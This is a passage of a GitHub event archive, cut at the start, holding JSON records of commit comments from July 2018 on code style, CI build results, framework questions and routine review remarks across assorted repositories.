\n^~\n```\n[tests/foreach,globals.R:112:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/foreach,globals.R#L112) *style:* **Lines should not be more than 80 characters.**\n```r\n​message(\"*** doFuture - automatically finiding ambiguous global/local variables ... DONE\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/options.R:5:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/options.R#L5) *style:* **Variable or function name should be snake_case.**\n```r\n​globalsAs <- doFuture:::globalsAs\n^~~~~~~~~\n```\n[tests/zzz_opt-in,caret.R:10:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/zzz_opt-in,caret.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/zzz_opt-in,plyr.R:5:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/zzz_opt-in,plyr.R#L5) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/zzz_opt-in,plyr.R:10:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/zzz_opt-in,plyr.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2018-07-07T03:07:20Z"}
{"id":"7931659076","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sagarsaindre/Htmlassignments"},"payload":{"comment":{"id":29628133,"position":6,"line":6,"path":"HTML_Assignments/Assignment2/index.html","commit_id":"e68f653d8195b5687b22a29d2fd2fc84d7b47e83","created_at":"2018-07-07T03:08:59Z","updated_at":"2018-07-07T03:08:59Z","author_association":"NONE","body":"Indentation"}},"created_at":"2018-07-07T03:08:59Z"}
{"id":"7931659750","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sagarsaindre/Htmlassignments"},"payload":{"comment":{"id":29628134,"position":64,"line":64,"path":"HTML_Assignments/Assignment2/index.html","commit_id":"e68f653d8195b5687b22a29d2fd2fc84d7b47e83","created_at":"2018-07-07T03:09:38Z","updated_at":"2018-07-07T03:09:38Z","author_association":"NONE","body":"Meaningful class names ? Dont use p2 and p3 as class names"}},"created_at":"2018-07-07T03:09:38Z"}
{"id":"7931660047","type":"CommitCommentEvent","actor":{"login":"sergpolly"},"repo":{"name":"dekkerlab/cooltools"},"payload":{"comment":{"id":29628135,"position":null,"line":null,"path":null,"commit_id":"634f195a75e590c3a25731a2a170ea2144ba39f5","created_at":"2018-07-07T03:09:58Z","updated_at":"2018-07-07T03:09:58Z","author_association":"MEMBER","body":"It is working at this point, and for all of the same parameters produces the same results as before."}},"created_at":"2018-07-07T03:09:58Z"}
{"id":"7931660942","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29628137,"position":45,"line":166,"path":"Assignment2/css/style.css","commit_id":"a334c2565242e9da67aa428f57b944468b9c8085","created_at":"2018-07-07T03:10:48Z","updated_at":"2018-07-07T03:10:48Z","author_association":"NONE","body":"Indentation"}},"created_at":"2018-07-07T03:10:48Z"}
{"id":"7931663209","type":"CommitCommentEvent","actor":{"login":"lassekongo83"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29628141,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-07T03:13:06Z","updated_at":"2018-07-07T03:13:06Z","author_association":"NONE","body":"@okiehsch: Are you using responsive mode or switching your user agent in your browser's dev tools? You need to be on an actual mobile device for the env_mobile filters to work."}},"created_at":"2018-07-07T03:13:06Z"}
{"id":"7931663613","type":"CommitCommentEvent","actor":{"login":"wh187"},"repo":{"name":"wh187/test2"},"payload":{"comment":{"id":29628142,"position":null,"line":null,"path":null,"commit_id":"c0a903dc63dc8f4e2d0edd6dc4d2f4d1e4f6fb54","created_at":"2018-07-07T03:13:29Z","updated_at":"2018-07-07T03:13:29Z","author_association":"OWNER","body":"修改4"}},"created_at":"2018-07-07T03:13:29Z"}
{"id":"7931664680","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"melpa/melpa"},"payload":{"comment":{"id":29628145,"position":null,"line":null,"path":null,"commit_id":"84a07e1e453cf9c01c78910d46c43f96926544c0","created_at":"2018-07-07T03:14:32Z","updated_at":"2018-07-07T03:14:32Z","author_association":"MEMBER","body":"Oh, now I understand - this is not an executable but a command. Sorry about that."}},"created_at":"2018-07-07T03:14:32Z"}
{"id":"7931665879","type":"CommitCommentEvent","actor":{"login":"WilliamGuozi"},"repo":{"name":"WilliamGuozi/WilliamGuozi.github.io"},"payload":{"comment":{"id":29628151,"position":null,"line":null,"path":null,"commit_id":"504f00a5b0fec68e9aa4415eff448b4317f4478e","created_at":"2018-07-07T03:15:38Z","updated_at":"2018-07-07T03:15:38Z","author_association":"OWNER","body":"back to old logo"}},"created_at":"2018-07-07T03:15:38Z"}
{"id":"7931666474","type":"CommitCommentEvent","actor":{"login":"qconrad"},"repo":{"name":"qconrad/intellistar-emulator"},"payload":{"comment":{"id":29628154,"position":null,"line":null,"path":null,"commit_id":"fceda0b6fb3419cfe5edd98d0152d460a9b9bfdf","created_at":"2018-07-07T03:16:12Z","updated_at":"2018-07-07T03:16:12Z","author_association":"OWNER","body":"No problem. I wouldn't have noticed it if there weren't thunderstorms in my forecast haha."}},"created_at":"2018-07-07T03:16:12Z"}
{"id":"7931669167","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29628157,"position":null,"line":null,"path":null,"commit_id":"7d107897e0cafdfcb4ee38926992c75d8e471e9e","created_at":"2018-07-07T03:18:56Z","updated_at":"2018-07-07T03:18:56Z","author_association":"CONTRIBUTOR","body":"pull request ![pullrequest](https://user-images.githubusercontent.com/31389848/42406293-937471e2-819c-11e8-9b92-72b5e612f269.png)\r\n\r\n\r\n```svg\r\n<svg width=\"30\" height=\"40\" aria-hidden=\"true\" version=\"1.1\" viewBox=\"0 0 12 16\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M11 11.28V5c-.03-.78-.34-1.47-.94-2.06C9.46 2.35 8.78 2.03 8 2H7V0L4 3l3 3V4h1c.27.02.48.11.69.31.21.2.3.42.31.69v6.28A1.993 1.993 0 0 0 10 15a1.993 1.993 0 0 0 1-3.72zm-1 2.92c-.66 0-1.2-.55-1.2-1.2 0-.65.55-1.2 1.2-1.2.65 0 1.2.55 1.2 1.2 0 .65-.55 1.2-1.2 1.2zM4 3c0-1.11-.89-2-2-2a1.993 1.993 0 0 0-1 3.72v6.56A1.993 1.993 0 0 0 2 15a1.993 1.993 0 0 0 1-3.72V4.72c.59-.34 1-.98 1-1.72zm-.8 10c0 .66-.55 1.2-1.2 1.2-.65 0-1.2-.55-1.2-1.2 0-.65.55-1.2 1.2-1.2.65 0 1.2.55 1.2 1.2zM2 4.2C1.34 4.2.8 3.65.8 3c0-.65.55-1.2 1.2-1.2.65 0 1.2.55 1.2 1.2 0 .65-.55 1.2-1.2 1.2z\" fill-rule=\"evenodd\"/></svg>\r\n```"}},"created_at":"2018-07-07T03:18:56Z"}
{"id":"7931672383","type":"CommitCommentEvent","actor":{"login":"sjau"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29628162,"position":null,"line":null,"path":null,"commit_id":"02e40d97fb15e3e870e4c53ee209d8c1d2557fcd","created_at":"2018-07-07T03:22:06Z","updated_at":"2018-07-07T03:22:06Z","author_association":"CONTRIBUTOR","body":"This feels wrong? The file is explicitely named as 2.0.nix.\r\n\r\nWhy would it then use guessit 3.0.0? I mean for the default.nix guessit 3.0.0 is ok but if 2.0 is specified one doesn't expect 3.0.0."}},"created_at":"2018-07-07T03:22:06Z"}
{"id":"7931678866","type":"CommitCommentEvent","actor":{"login":"StudentBlake"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29628184,"position":null,"line":null,"path":null,"commit_id":"7649d62217b79df4d89e56fb0b6de28a3f611096","created_at":"2018-07-07T03:28:43Z","updated_at":"2018-07-07T03:28:43Z","author_association":"CONTRIBUTOR","body":"Check out my latest commit! I did this differently. Your way is probably better, but I added a backgroundworker for loading this list and it complicates the code a little."}},"created_at":"2018-07-07T03:28:43Z"}
{"id":"7931680723","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29628188,"position":null,"line":null,"path":null,"commit_id":"8f42fafd9287e8041559ca4d127903afd18a6149","created_at":"2018-07-07T03:30:30Z","updated_at":"2018-07-07T03:30:30Z","author_association":"CONTRIBUTOR","body":"@lassekongo83 thanks, that explains my results.\r\n"}},"created_at":"2018-07-07T03:30:30Z"}
{"id":"7931681449","type":"CommitCommentEvent","actor":{"login":"wufeng-aaa"},"repo":{"name":"wufeng-aaa/GongbuShow"},"payload":{"comment":{"id":29628189,"position":null,"line":null,"path":null,"commit_id":"f3f1512645cdc5e7f24fd5d31e5b28e4ffc44f84","created_at":"2018-07-07T03:31:10Z","updated_at":"2018-07-07T03:31:10Z","author_association":"OWNER","body":"![_20180707_112743](https://user-images.githubusercontent.com/36912337/42406390-33eabd98-81d9-11e8-8d86-2aa8eb4a5593.png)\r\n"}},"created_at":"2018-07-07T03:31:10Z"}
{"id":"7931682908","type":"CommitCommentEvent","actor":{"login":"Tropicalista"},"repo":{"name":"ortus-docs/quick-docs"},"payload":{"comment":{"id":29628191,"position":37,"line":78,"path":"getting-started/defining-an-entity.md","commit_id":"06ffbaded7e1036ba70e3910a23eeb32fd6d26ed","created_at":"2018-07-07T03:32:32Z","updated_at":"2018-07-07T03:32:32Z","author_association":"NONE","body":"Can you ploease clarify if the accessors are autogenerated or I need to insert all property in my model?\r\n\r\nI'm trying with a model like this:\r\n\r\n```\r\ncomponent quick accessors=\"true\" {\r\n\r\n    // the name of the table is the pluralized version of the model\r\n    // all fields in a table are mapped by default\r\n    // both of these points can be configured on a per-entity basis\r\n\r\n    property name=\"name\";\r\n    //property name=\"email\";\r\n    //property name=\"citta\";\r\n    //property name=\"paese\";\r\n\r\n}\r\n```\r\n\r\nI can use getName() because the property is specified, but I got a not defined function error if I try with getEmail()."}},"created_at":"2018-07-07T03:32:32Z"}
{"id":"7931684062","type":"CommitCommentEvent","actor":{"login":"mvertescher"},"repo":{"name":"noahp/piesvg"},"payload":{"comment":{"id":29628194,"position":null,"line":null,"path":null,"commit_id":"f1a745b9bd669f6cc1f176360206b20f8b579a74","created_at":"2018-07-07T03:33:47Z","updated_at":"2018-07-07T03:33:47Z","author_association":"CONTRIBUTOR","body":":rofl: good catch!"}},"created_at":"2018-07-07T03:33:47Z"}
{"id":"7931684197","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29628196,"position":22,"line":150,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackers.java","commit_id":"525453690f29787c6734f8234c6232e2372a1970","created_at":"2018-07-07T03:33:56Z","updated_at":"2018-07-07T03:33:56Z","author_association":"COLLABORATOR","body":"bug"}},"created_at":"2018-07-07T03:33:56Z"}
{"id":"7931685107","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29628198,"position":40,"line":72,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackersDataLine.java","commit_id":"525453690f29787c6734f8234c6232e2372a1970","created_at":"2018-07-07T03:34:54Z","updated_at":"2018-07-07T03:34:54Z","author_association":"COLLABORATOR","body":"perhaps this won't be necessary if you do this update inside the item holder constructor, and encapsulate announceEntry with delegate methods."}},"created_at":"2018-07-07T03:34:54Z"}
{"id":"7931685148","type":"CommitCommentEvent","actor":{"login":"frankwei98"},"repo":{"name":"Andoromeda-Foundation/cryptohero-frontend-nas"},"payload":{"comment":{"id":29628199,"position":4,"line":2,"path":"src/contract/contract.js","commit_id":"ce9f082e6aa9aedf7d74e56acc90c0cd4c42b104","created_at":"2018-07-07T03:34:57Z","updated_at":"2018-07-07T03:34:57Z","author_association":"COLLABORATOR","body":"刚刚测试了一下  `import 'nasa.js/dist/nasa'` 可以"}},"created_at":"2018-07-07T03:34:57Z"}
{"id":"7931685378","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29628200,"position":12,"line":71,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailTrackersDataLine.java","commit_id":"525453690f29787c6734f8234c6232e2372a1970","created_at":"2018-07-07T03:35:10Z","updated_at":"2018-07-07T03:35:10Z","author_association":"COLLABORATOR","body":"and here just work with holder."}},"created_at":"2018-07-07T03:35:10Z"}
{"id":"7931685536","type":"CommitCommentEvent","actor":{"login":"Kheiden"},"repo":{"name":"Kheiden/RPi-tankbot"},"payload":{"comment":{"id":29628201,"position":null,"line":null,"path":null,"commit_id":"d40a91a761536afa8a58355144079bc87044c70f","created_at":"2018-07-07T03:35:21Z","updated_at":"2018-07-07T03:35:21Z","author_association":"OWNER","body":"tsk, tsk, tsk..."}},"created_at":"2018-07-07T03:35:21Z"}
{"id":"7931685733","type":"CommitCommentEvent","actor":{"login":"TheDevelopingProgrammer"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29628202,"position":null,"line":null,"path":null,"commit_id":"e7fb4e6973bbcf640780e44e18f3c12344460138","created_at":"2018-07-07T03:35:34Z","updated_at":"2018-07-07T03:35:34Z","author_association":"NONE","body":"\r\nI am not able to save to database because my customer object is not being sent to the Save function and I don't know why.\r\n\r\nIn Save Action I have:\r\n\r\n[HttpPost]\r\n        public ActionResult Save(Customers customer)\r\n        {\r\n            if(customer.Id == 0)\r\n                _context.Customers.Add(customer);\r\n            else\r\n            {\r\n                var customerInDb = _context.Customers.Single(c => c.Id == customer.Id);\r\n                \r\n                customerInDb.Name = customer.Name;\r\n                customerInDb.Birthday = customer.Birthday;\r\n                customerInDb.MembershipTypeId = customer.MembershipTypeId;\r\n                customerInDb.IsSubscribedToNewsLetter = customer.IsSubscribedToNewsLetter;\r\n            }\r\n\r\n            _context.SaveChanges();\r\n            \r\n            return RedirectToAction(\"Index\", \"Customer\");\r\n        }\r\n\r\n\r\n\r\nin CustomerForm I have:\r\n\r\n\r\n\r\n@model Vidly2.ViewModels.CustomerFormViewModel\r\n@{\r\n    ViewBag.Title = \"New\";\r\n    Layout = \"~/Views/Shared/_Layout.cshtml\";\r\n}\r\n\r\n<h2>New Customer</h2>\r\n\r\n@using (Html.BeginForm(\"Save\", \"Customer\"))\r\n{\r\n    <div class=\"form-group\">\r\n        @Html.LabelFor(m => m.Customers.Name)\r\n        @Html.TextBoxFor(m => m.Customers.Name, new { @class = \"form-control\" })\r\n    </div>\r\n    <div class=\"form-group\">\r\n        @Html.LabelFor(m => m.Customers.Birthday)\r\n        @Html.TextBoxFor(m => m.Customers.Birthday, \"{0:d MMM yyyy}\", new { @class = \"form-control\" })\r\n    </div>\r\n     \r\n    <div class=\"form-group\">\r\n        @Html.LabelFor(m => m.Customers.MembershipTypeId)\r\n        @Html.DropDownListFor(m => m.Customers.MembershipTypeId, new SelectList(Model.MembershipTypes, \"Id\", \"Name\"), \"Select Membership Type\", new { @class = \"form-control\" })\r\n    </div>\r\n\r\n    <div class=\"checkbox\">\r\n        <label>\r\n            @Html.CheckBoxFor(m => m.Customers.IsSubscribedToNewsLetter) Subscribe to Newsletter?\r\n        </label>\r\n    </div>\r\n\r\n    @Html.HiddenFor(m => m.Customers.Id)\r\n    <button type=\"submit\" class=\"btn btn-primary\">Save</button>\r\n}"}},"created_at":"2018-07-07T03:35:34Z"}
{"id":"7931686337","type":"CommitCommentEvent","actor":{"login":"vlaidmeR"},"repo":{"name":"twilio/sample-code"},"payload":{"comment":{"id":29628205,"position":21,"line":28,"path":"lookups/v1/phone_number/fetch-payfone-tcpa-compliance/fetch-payfone-tcpa-compliance.5.x.cs","commit_id":"8bf049b0420d4eaa57a0e9ad41be5b8119ce4083","created_at":"2018-07-07T03:36:12Z","updated_at":"2018-07-07T03:36:12Z","author_association":"NONE","body":"+966555688589\r\n"}},"created_at":"2018-07-07T03:36:12Z"}
{"id":"7931687393","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29628207,"position":null,"line":null,"path":null,"commit_id":"ae8e95f249732ce4555584e8d0d8e469c4119edb","created_at":"2018-07-07T03:37:13Z","updated_at":"2018-07-07T03:37:13Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/ae8e95f249732ce4555584e8d0d8e469c4119edb#commitcomment-29626671) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/6012ff8acd47b5a8a4a13fffc576e235b8ccdc5a/ae8e95f_vs_2ba3fbb/report.md). cc @ararslan"}},"created_at":"2018-07-07T03:37:13Z"}
{"id":"7931687485","type":"CommitCommentEvent","actor":{"login":"frankwei98"},"repo":{"name":"Andoromeda-Foundation/cryptohero-frontend-nas"},"payload":{"comment":{"id":29628208,"position":8,"line":5,"path":"src/contract/contract.js","commit_id":"ce9f082e6aa9aedf7d74e56acc90c0cd4c42b104","created_at":"2018-07-07T03:37:19Z","updated_at":"2018-07-07T03:37:19Z","author_association":"COLLABORATOR","body":"``` javascript\r\nconst nebPay = Nasa.nebPay\r\n```\r\n可以正常工作哦 \r\n但是没有给nano扫描的交易二维码 pop up\r\n因为一开始用的是 nebpay.js \r\n为了简化工作量 我们先从 nasa.js 引入nebpay 后续再直接使用 nasa 合约交互的方法"}},"created_at":"2018-07-07T03:37:19Z"}
{"id":"7931688741","type":"CommitCommentEvent","actor":{"login":"greyli"},"repo":{"name":"helloflask/timer"},"payload":{"comment":{"id":29628211,"position":41,"line":39,"path":"templates/index.html","commit_id":"956381fcc21d04a0e3ab78d113c58dc983ca7062","created_at":"2018-07-07T03:38:32Z","updated_at":"2018-07-07T03:38:32Z","author_association":"MEMBER","body":"The text was displayed by JavaScript ([timer.js #13](https://github.com/helloflask/timer/blob/master/static/js/timer.js#L13)). How do you run the app?"}},"created_at":"2018-07-07T03:38:32Z"}
{"id":"7931692112","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628219,"position":null,"line":null,"path":null,"commit_id":"ea02aa2bd31654f00ef055f77c69fe89623aee44","created_at":"2018-07-07T03:41:45Z","updated_at":"2018-07-07T03:41:45Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.22%25-red.png)</a> \n"}},"created_at":"2018-07-07T03:41:45Z"}
{"id":"7931693770","type":"CommitCommentEvent","actor":{"login":"wangprince2017"},"repo":{"name":"wangprince2017/rwtianqi"},"payload":{"comment":{"id":29628221,"position":null,"line":null,"path":null,"commit_id":"3a5a1994f960fd0bc775d25310c2d14d690b4dd4","created_at":"2018-07-07T03:43:23Z","updated_at":"2018-07-07T03:43:23Z","author_association":"OWNER","body":"手机天气预报设计与实现\r\n摘 要：随着中国网络和移动平台的不断发展，传统的从电视上收看天气预报已经显露出其诸多的不足，例如时间固定，如果错过了就看不到了。天气内容相对简单，由于节目时长的限制，其内容往往不够详细，通常只有温度和降水信息。而手机天气预报很好的解决了这些问题，手机天气预报只需要有一部能上网的手机，就能随时随地查看全国各地的天气预报，而且其详细程度远远超过传统电视节目，甚至可以根据未来的天气给人们的出行提供建议，无论是易用性和实用性都远超传统的通过电视节目播放的天气预报。\r\n本软件运用Java技术与Android平台相结合的方式，使用了xUtils快速开发框架，实现了今日天气，实时天气，未来天气，生活指数，城市选择，天气提醒，常驻通知栏设置,天气提醒设置,自动更新天气设置,主页默认显示设置,自定义主页背景,通知栏字体颜色设置等功能。\r\n关键词：xUtils3；Android；Java"}},"created_at":"2018-07-07T03:43:23Z"}
{"id":"7931694984","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"dev-harsh1998/android_device_lenovo_a6000"},"payload":{"comment":{"id":29628225,"position":null,"line":null,"path":null,"commit_id":"9798a20c870d0b64ea47c03e8bd966986705fd3b","created_at":"2018-07-07T03:44:33Z","updated_at":"2018-07-07T03:44:33Z","author_association":"NONE","body":"a6000 has stock support for manual provisioning??\r\n\r\nif not , then this works??"}},"created_at":"2018-07-07T03:44:33Z"}
{"id":"7931696958","type":"CommitCommentEvent","actor":{"login":"Robo-Sapiens"},"repo":{"name":"Robo-Sapiens/FTC-Code2018"},"payload":{"comment":{"id":29628231,"position":null,"line":null,"path":null,"commit_id":"93336e9b14c3ff7f6d770ec912329fc414c16c14","created_at":"2018-07-07T03:46:33Z","updated_at":"2018-07-07T03:46:33Z","author_association":"OWNER","body":"This was Raj by the way"}},"created_at":"2018-07-07T03:46:33Z"}
{"id":"7931698789","type":"CommitCommentEvent","actor":{"login":"alexeyneu"},"repo":{"name":"aromanro/LatticeBoltzmann"},"payload":{"comment":{"id":29628233,"position":null,"line":null,"path":null,"commit_id":"4d87203b8fb7d8344bc888d0cd09bf8b522f34c8","created_at":"2018-07-07T03:48:27Z","updated_at":"2018-07-07T03:48:27Z","author_association":"NONE","body":"means demand of avx2 cpu to be able to run . not sure this is that what were expected "}},"created_at":"2018-07-07T03:48:27Z"}
{"id":"7931701257","type":"CommitCommentEvent","actor":{"login":"rraustad"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628237,"position":null,"line":null,"path":null,"commit_id":"ea02aa2bd31654f00ef055f77c69fe89623aee44","created_at":"2018-07-07T03:50:52Z","updated_at":"2018-07-07T03:50:52Z","author_association":"CONTRIBUTOR","body":"Your Mac is broken."}},"created_at":"2018-07-07T03:50:52Z"}
{"id":"7931706081","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29628242,"position":null,"line":null,"path":null,"commit_id":"6014e7d9ef4d540b645c9b0ddd05f2998a03b31c","created_at":"2018-07-07T03:56:03Z","updated_at":"2018-07-07T03:56:03Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-07T03:56:03Z"}
{"id":"7931707549","type":"CommitCommentEvent","actor":{"login":"susanschen"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29628243,"position":null,"line":null,"path":null,"commit_id":"311f80d83b9a36ad0267ae31deb15285b12c2645","created_at":"2018-07-07T03:57:40Z","updated_at":"2018-07-07T03:57:40Z","author_association":"NONE","body":"The code to refresh the screen are on lines 154 to 182 (click on the expand icon to see hidden lines).\r\n\r\n@MaginoM, to change the text in **CatalogActivity** to display a different message, add a new string in xml, and then set the message to the new string. \r\n\r\n`<string name=\"delete_all_pet_dialog_msg\">Delete all pets?</string>`\r\n`builder.setMessage(R.string.delete_all_pet_dialog_msg);`"}},"created_at":"2018-07-07T03:57:40Z"}
{"id":"7931709257","type":"CommitCommentEvent","actor":{"login":"wowwow21098"},"repo":{"name":"meefik/busybox"},"payload":{"comment":{"id":29628244,"position":11,"line":11,"path":"app/build.gradle","commit_id":"8360144f5ec0683ca60e4e39b50909482ad1fef7","created_at":"2018-07-07T03:59:07Z","updated_at":"2018-07-07T03:59:07Z","author_association":"NONE","body":"-"}},"created_at":"2018-07-07T03:59:07Z"}
{"id":"7931709966","type":"CommitCommentEvent","actor":{"login":"wowwow21098"},"repo":{"name":"meefik/busybox"},"payload":{"comment":{"id":29628246,"position":4,"line":5,"path":"app/build.gradle","commit_id":"8360144f5ec0683ca60e4e39b50909482ad1fef7","created_at":"2018-07-07T03:59:47Z","updated_at":"2018-07-07T03:59:47Z","author_association":"NONE","body":"Help"}},"created_at":"2018-07-07T03:59:47Z"}
{"id":"7931717308","type":"CommitCommentEvent","actor":{"login":"brent20"},"repo":{"name":"CCOSTAN/Home-AssistantConfig"},"payload":{"comment":{"id":29628259,"position":null,"line":null,"path":null,"commit_id":"0d889da2b6c67cdf850efcfe2143aee5a4ab5be9","created_at":"2018-07-07T04:05:17Z","updated_at":"2018-07-07T04:05:17Z","author_association":"NONE","body":"Mine is not working either, did this commit do the trick? Thanks!"}},"created_at":"2018-07-07T04:05:17Z"}
{"id":"7931717315","type":"CommitCommentEvent","actor":{"login":"fiyun123"},"repo":{"name":"fiyun123/fly"},"payload":{"comment":{"id":29628260,"position":null,"line":null,"path":null,"commit_id":"9c490fbb2ccf7fb6d66be25663c0c61ccd8a19aa","created_at":"2018-07-07T04:05:17Z","updated_at":"2018-07-07T04:05:17Z","author_association":"OWNER","body":"A"}},"created_at":"2018-07-07T04:05:17Z"}
{"id":"7931718573","type":"CommitCommentEvent","actor":{"login":"vitorgamer58"},"repo":{"name":"pankaj9310/peatio"},"payload":{"comment":{"id":29628261,"position":null,"line":null,"path":null,"commit_id":"6848ecb0a231e17ea35b2a307d3c610b2f84f34e","created_at":"2018-07-07T04:06:05Z","updated_at":"2018-07-07T04:06:05Z","author_association":"NONE","body":"I get the same, but without the error on end.\r\n\r\n*** Start nbr liability proof generation ***\r\nGenerating root node ..\r\nGenerating partial trees ..\r\n4 partial trees generated.\r\n\r\n*** Fetching nbr total assets ***\r\naddress balances fetched.\r\n\r\n*** Start dash liability proof generation ***\r\nComplete.\r\n\r\n\r\nFor some reason he does not seem to finish working with DASH."}},"created_at":"2018-07-07T04:06:05Z"}
{"id":"7931721015","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29628264,"position":null,"line":null,"path":null,"commit_id":"ee73b8ec54aa746eecfb0851fe3fe74d89555c68","created_at":"2018-07-07T04:08:31Z","updated_at":"2018-07-07T04:08:31Z","author_association":"MEMBER","body":"That should've been `mdk3:mdk3|mdk4`."}},"created_at":"2018-07-07T04:08:31Z"}
{"id":"7931723322","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628267,"position":null,"line":null,"path":null,"commit_id":"aae388b45b15dd61bf1a1356c58b08321deee879","created_at":"2018-07-07T04:10:53Z","updated_at":"2018-07-07T04:10:53Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-07T04:10:53Z"}
{"id":"7931724767","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628270,"position":null,"line":null,"path":null,"commit_id":"aae388b45b15dd61bf1a1356c58b08321deee879","created_at":"2018-07-07T04:12:17Z","updated_at":"2018-07-07T04:12:17Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T04:12:17Z"}
